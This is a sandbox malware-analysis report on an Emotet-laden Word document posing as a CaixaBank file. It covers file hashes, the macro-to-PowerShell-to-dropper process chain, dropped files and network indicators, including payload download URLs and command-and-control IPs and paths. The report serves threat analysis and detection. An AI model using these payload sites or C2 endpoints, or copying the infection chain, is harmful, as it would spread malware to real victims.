File name: CaixaBank 7150970035345376.doc
Full analysis: https://app.any.run/tasks/fa8b4d41-01a4-4b8b-9b78-d354f477cc77
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into a highly destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: September 19, 2019, 11:27:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, emotet-doc, emotet, trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Triple-buffered New Hampshire, Subject: Ergonomic Wooden Car, Author: Rosina Rowe, Comments: Fall tan, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 07:46:00 2019, Last Saved Time/Date: Thu Sep 19 07:46:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5: 2D46AA86A46A424F66E8A72FF975BBDF
SHA1: BCCEE59D492C1A5EEEA7BC54B3F2EB03BFEFE2EE
SHA256: 47C0ADBB3E78AA5317BA38CA2DCA6182C468CECD3BC868CFCDC24D3F5434D1CA
SSDEEP: 6144:zXSY2WaPaQxUk+MclQDgQOaPLkI27NSU4jJntATfDeTPsOupth:zCY2WaPaQxUk+MclQDgQO4X27NSU4VeF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for the user's own assessment. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • 572.exe (PID: 2332)
      • 572.exe (PID: 3468)
      • 572.exe (PID: 3344)
      • 572.exe (PID: 4060)
      • easywindow.exe (PID: 2784)
      • easywindow.exe (PID: 3492)
      • easywindow.exe (PID: 2872)
      • easywindow.exe (PID: 3524)
    • Emotet process was detected
      • 572.exe (PID: 2332)
    • Changes the autorun value in the registry
      • easywindow.exe (PID: 3524)
    • EMOTET was detected
      • easywindow.exe (PID: 3524)
    • Connects to CnC server
      • easywindow.exe (PID: 3524)
  • SUSPICIOUS
    • Creates files in the user directory
      • powershell.exe (PID: 2516)
    • Executed via WMI
      • powershell.exe (PID: 2516)
    • PowerShell script executed
      • powershell.exe (PID: 2516)
    • Executable content was dropped or overwritten
      • powershell.exe (PID: 2516)
      • 572.exe (PID: 2332)
    • Application launched itself
      • 572.exe (PID: 4060)
      • easywindow.exe (PID: 2784)
    • Starts itself from another location
      • 572.exe (PID: 2332)
    • Connects to server without host name
      • easywindow.exe (PID: 3524)
  • INFO
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 3536)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 3536)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Triple-buffered New Hampshire
Subject: Ergonomic Wooden Car
Author: Rosina Rowe
Keywords: -
Comments: Fall tan
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:19 06:46:00
ModifyDate: 2019:09:19 06:46:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Raynor LLC
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs: Title, 1
Manager: Greenholt
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Total processes: 44
Monitored processes: 10
Malicious processes: 8
Suspicious processes: 1

Behavior graph

[Interactive graph not reproduced here. Chain shown: winword.exe starts powershell.exe, which drops and starts 572.exe (four instances, PID 2332 flagged #EMOTET); 572.exe drops and starts easywindow.exe (four instances, PID 3524 flagged #EMOTET).]

Process information

All processes ran as user "admin" at integrity level MEDIUM, and all carry version information naming Microsoft Corporation as the company. The encoded PowerShell command line is not reproduced on this page.

PID | CMD | Path | Indicators | Parent process | Description | Version | Exit code
3536 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\CaixaBank 7150970035345376.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | - | explorer.exe | Microsoft Word | 14.0.6024.1000 | -
2516 | powershell -encod [encoded command removed] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | - | wmiprvse.exe | Windows PowerShell | 6.1.7600.16385 (win7_rtm.090713-1255) | 0
4060 | "C:\Users\admin\572.exe" | C:\Users\admin\572.exe | - | powershell.exe | Display Control Panel | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0
3344 | "C:\Users\admin\572.exe" | C:\Users\admin\572.exe | - | 572.exe | Display Control Panel | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0
3468 | --fb4ffeee | C:\Users\admin\572.exe | - | 572.exe | Display Control Panel | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0
2332 | --fb4ffeee | C:\Users\admin\572.exe | #EMOTET | 572.exe | Display Control Panel | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0
3492 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | - | 572.exe | Display Control Panel | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0
2784 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | - | easywindow.exe | Display Control Panel | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0
2872 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | - | easywindow.exe | Display Control Panel | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0
3524 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | #EMOTET | easywindow.exe | Display Control Panel | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | -
Total events: 1 769
Read events: 1 276
Write events: 0
Delete events: 0
Modification events: No data

Executable files: 2
Suspicious files: 10
Text files: 0
Unknown types: 43

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
3536 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9B2B.tmp | cvr | - | -
3536 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 62F2DA178DD59EBA6B61EE250E55F925 | 8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244
3536 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39D4716C.wmf | wmf | C838C0381F846C4469AA926F969BB1CC | 7C34EF096C1BF2ABF48886700592C9E9F102DA015F0257D04BB225D53EF04A84
3536 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23BC8AF2.wmf | wmf | 3C4950D3835FE5CF6ABD0547E107885E | 15582AC37617D631DD2BB8E7A7D7923A60D4EA20164C3173052C4AF5405B039A
3536 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BB165A.wmf | wmf | A9A68F1CF890C61351DB375351918D5E | 68FBE88F7124F3F5969E320012C44991CB81A9E6AD07468FD9073ABBB3FE4403
3536 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87A34844.wmf | wmf | 7556E8DDEDA7E8A31B71D9BFE6568FA7 | F78B18DE606AAD9281AA3DB9811711D816537E76E743DDD2B20184299DF8B41A
3536 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7C7017D0.wmf | wmf | 92C158D7691CB4B759A8D9BE4597B595 | 5D4C01B42DEE2106E90F64E7506F76459BC794857F65F5B2CD938D042AB40C2C
3536 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 989B0CC17760E029722B08261CCA91C7 | 01407F7415D9EB5AFEEE9634ABECA631E715497CD76B279D692EF5F50911DD84
3536 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2095D2E.wmf | wmf | 8B6FD8CE98E0833D8E7B38BE7ED3B9E4 | 175FC3500DDB733E28067B4B1C52D84059592310D31909A2D03CDFF87638536A
3536 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D547AC46.wmf | wmf | C9325DBB5928ED5BC3E274C27F6C4AAC | FF565EF02746428ECD13B068520B570D53A631F0BD1AF6E59EC6507A1D42A444
HTTP(S) requests: 6
TCP/UDP connections: 12
DNS requests: 7
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2516 | powershell.exe | GET | 301 | 104.28.2.238:80 | http://healthknowledge.my/wp-includes/gi7jeaol4m_0cke1q0y-76/ | US | - | - | shared
3524 | easywindow.exe | GET | - | 69.43.168.232:443 | http://69.43.168.232:443/whoami.php | US | - | - | malicious
3524 | easywindow.exe | GET | - | 69.43.168.232:443 | http://69.43.168.232:443/whoami.php | US | - | - | malicious
3524 | easywindow.exe | POST | - | 187.147.50.167:8080 | http://187.147.50.167:8080/health/ | MX | - | - | malicious
3524 | easywindow.exe | POST | - | 190.18.146.70:80 | http://190.18.146.70/iplk/iplk/ | AR | - | - | malicious
3524 | easywindow.exe | POST | 200 | 187.147.50.167:8080 | http://187.147.50.167:8080/report/ | MX | binary | 1.38 Mb | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2516 | powershell.exe | 35.178.150.201:443 | www.structures-made-easy.co.uk | Amazon.com, Inc. | GB | unknown
2516 | powershell.exe | 145.14.145.212:443 | offside2.000webhostapp.com | Hostinger International Limited | US | shared
2516 | powershell.exe | 104.28.18.13:443 | aniventure.co.uk | Cloudflare Inc | US | shared
2516 | powershell.exe | 145.14.144.160:443 | pramodkumarsingh.000webhostapp.com | Hostinger International Limited | US | shared
2516 | powershell.exe | 104.28.2.238:80 | healthknowledge.my | Cloudflare Inc | US | shared
2516 | powershell.exe | 104.28.19.13:443 | aniventure.co.uk | Cloudflare Inc | US | shared
3524 | easywindow.exe | 190.18.146.70:80 | - | CABLEVISION S.A. | AR | malicious
2516 | powershell.exe | 104.28.2.238:443 | healthknowledge.my | Cloudflare Inc | US | shared
3524 | easywindow.exe | 187.147.50.167:8080 | - | Uninet S.A. de C.V. | MX | malicious
3524 | easywindow.exe | 69.43.168.232:443 | - | Castle Access Inc | US | malicious

DNS requests

Domain | IP | Reputation
aniventure.co.uk | 104.28.18.13, 104.28.19.13 | malicious
dns.msftncsi.com | 131.107.255.255 | shared
www.structures-made-easy.co.uk | 35.178.150.201 | unknown
offside2.000webhostapp.com | 145.14.145.212 | shared
pramodkumarsingh.000webhostapp.com | 145.14.144.160 | shared
healthknowledge.my | 104.28.2.238, 104.28.3.238 | unknown

Threats

PID | Process | Class | Message
- | - | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
2516 | powershell.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com)
- | - | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
2516 | powershell.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com)
3524 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3524 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3524 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
6 ETPRO signatures available at the full report
No debug info